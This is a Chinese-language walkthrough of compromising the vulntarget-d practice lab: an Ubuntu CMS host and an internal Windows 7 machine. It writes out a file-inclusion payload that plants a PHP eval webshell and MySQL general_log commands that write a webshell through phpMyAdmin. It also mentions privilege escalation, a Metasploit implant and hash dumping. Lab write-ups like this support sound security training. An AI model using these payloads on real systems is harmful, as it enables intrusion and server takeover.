【永久开源】vulntarget-d 打靶记录——作者:NaMi

admin 2022年2月16日02:52:55评论127 views字数 3196阅读10分39秒阅读模式
✎ 阅读须知


乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!

本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!


本文作者:NaMi   本文已获得作者授权


vuntarget免责声明


vulntarget靶场系列仅供安全专业人员练习渗透测试技术,此靶场所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用靶场中的技术资料对任何计算机系统进行入侵操作。利用此靶场所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

vulntarget靶场系列拥有对此靶场系列的的修改、删除和解释权限,未经授权,不得用于其他。


vulntarget地址:


https://github.com/crow821/vulntarget


欢迎多多star🌟 

vulntarget开源靶场交流群:(群已超过200人,只能通过邀请入群


【永久开源】vulntarget-d 打靶记录——作者:NaMi


目前已经超过200人,请添加下面的二维码为联系人之后,备注:靶场 进群!(一定要记得备注哦)

【永久开源】vulntarget-d 打靶记录——作者:NaMi

vulntarget-d 打靶记录

1. 拓扑

【永久开源】vulntarget-d 打靶记录——作者:NaMi

修改IP1192.168.0.103 kali192.168.0.105

2. Ubuntu

判断连通性

【永久开源】vulntarget-d 打靶记录——作者:NaMi

端口扫描

【永久开源】vulntarget-d 打靶记录——作者:NaMi

查看详细信息,由此可以判断出使用的宝塔面板,默认端口8888

【永久开源】vulntarget-d 打靶记录——作者:NaMi

81端口开放了一个cms

【永久开源】vulntarget-d 打靶记录——作者:NaMi

看到底下的版本信息:

1.可以寻找历史漏洞。2.自己审计

【永久开源】vulntarget-d 打靶记录——作者:NaMi

网上也有很多漏洞的复现

【永久开源】vulntarget-d 打靶记录——作者:NaMi

好巧,也是乌鸦师傅的文章

【永久开源】vulntarget-d 打靶记录——作者:NaMi

文件包含漏洞POC,一套丝滑小连招:

GET : [http://192.168.0.103:81/index.php?m=home&a=assign_resume_tpl](http://192.168.0.103:81/index.php?m=home&a=assign_resume_tpl)
POST : variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval($_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>
GET : [http://192.168.0.103:81/index.php?m=home&a=assign_resume_tpl](http://192.168.0.103:81/index.php?m=home&a=assign_resume_tpl)
POST : variable=1&tpl=data/Runtime/Logs/Home/22_02_10.log
GET : http://192.168.0.103:81/shell.php

接着访问被BT拦截了:

【永久开源】vulntarget-d 打靶记录——作者:NaMi

写入一个phpinfo看一下,disable_function禁用的函数还不少:

【永久开源】vulntarget-d 打靶记录——作者:NaMi

没有过滤eval

passthru,exec,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

在第一次请求的时候需要注意shell会被拦截,写$_POST的时候要给$加一个转义否则会写入错误。在markdown中复制这个$是不带的,导致我浪费了一些时间:

variable=1&tpl=<?php fputs(fopen("sh4.php","w"),"<?php eval($_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

这样就拿下了这台机器

【永久开源】vulntarget-d 打靶记录——作者:NaMi

3. Ubuntu提权

上线MSF,首先生成一个木马文件:

【永久开源】vulntarget-d 打靶记录——作者:NaMi

然后启动一个监听:

【永久开源】vulntarget-d 打靶记录——作者:NaMi

将文件下载到目标机器

【永久开源】vulntarget-d 打靶记录——作者:NaMi

成功上线:

【永久开源】vulntarget-d 打靶记录——作者:NaMi

前段时间出了一个新的提权漏洞CVE-2021-4034,提权到root权限:

【永久开源】vulntarget-d 打靶记录——作者:NaMi

在桌面拿到第一个flag:

【永久开源】vulntarget-d 打靶记录——作者:NaMi

4. windows机器

看到第二块网卡

【永久开源】vulntarget-d 打靶记录——作者:NaMi

添加路由并进行端口扫描,深夜了我就直接针对IP进行端口扫描了,为了早点睡觉。看到开放了如下端口:

【永久开源】vulntarget-d 打靶记录——作者:NaMi

挂上代理访问没啥内容:

【永久开源】vulntarget-d 打靶记录——作者:NaMi

目录扫描,发现phpmyadmin

【永久开源】vulntarget-d 打靶记录——作者:NaMi

l.php是一个探针,而且数据库也是个弱密码

【永久开源】vulntarget-d 打靶记录——作者:NaMi

通过phpinfo界面得知了网站的绝对路径:

C:/phpstudy/PHPTutorial/WWW/phpinfo.php
【永久开源】vulntarget-d 打靶记录——作者:NaMi

然后通过弱口令进入phpmyadmin,通过写日志拿下webshell:

show global variables like "%genera%";          //查询general_log配置
set global general_log='on';              //开启general log模式
SET global general_log_file='C:/phpstudy/PHPTutorial/WWW/cmd.php';    //设置日志文件保存路径
SELECT '<?php phpinfo();?>';              //phpinfo()写入日志文件
set global general_log='off';              //关闭general_log模式

获取一个普通权限的shell

【永久开源】vulntarget-d 打靶记录——作者:NaMi

查看进程,发现了存在火绒:

【永久开源】vulntarget-d 打靶记录——作者:NaMi

查看systeminfo发现是一台win7机器,x64位:

【永久开源】vulntarget-d 打靶记录——作者:NaMi

5. windows提权

由于机器不出网,搞一个正向shell,并制作一个免杀马。成功上线:

【永久开源】vulntarget-d 打靶记录——作者:NaMi

使用这个漏洞提权没成功:

【永久开源】vulntarget-d 打靶记录——作者:NaMi

然后就是用了msf自带的getsystem,提权至system权限:

【永久开源】vulntarget-d 打靶记录——作者:NaMi

最后抓取hashadmin密码空,crow密码是admin

【永久开源】vulntarget-d 打靶记录——作者:NaMi

读取flag

【永久开源】vulntarget-d 打靶记录——作者:NaMi


tips:加我wx,拉你入群,一起学习


【永久开源】vulntarget-d 打靶记录——作者:NaMi


往期推荐


vulntarget漏洞靶场系列(四)— vulntarget-d

【永久开源】vulntarget-a 打靶记录

【永久开源】vulntarget-c 打靶记录

vulntarget漏洞靶场系列(三)— vulntarget-c

vulntarget漏洞靶场系列(二)— vulntarget-b

[永久开源] vulntarget-b_打靶记录

[永久开源] vulntarget-a_打靶记录

vulntarget漏洞靶场系列(一)


【永久开源】vulntarget-d 打靶记录——作者:NaMi
【永久开源】vulntarget-d 打靶记录——作者:NaMi

扫取二维码获取

更多精彩

乌鸦安全

【永久开源】vulntarget-d 打靶记录——作者:NaMi

原文始发于微信公众号(乌鸦安全):【永久开源】vulntarget-d 打靶记录——作者:NaMi

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月16日02:52:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【永久开源】vulntarget-d 打靶记录——作者:NaMihttps://cn-sec.com/archives/780151.html

发表评论

匿名网友 填写信息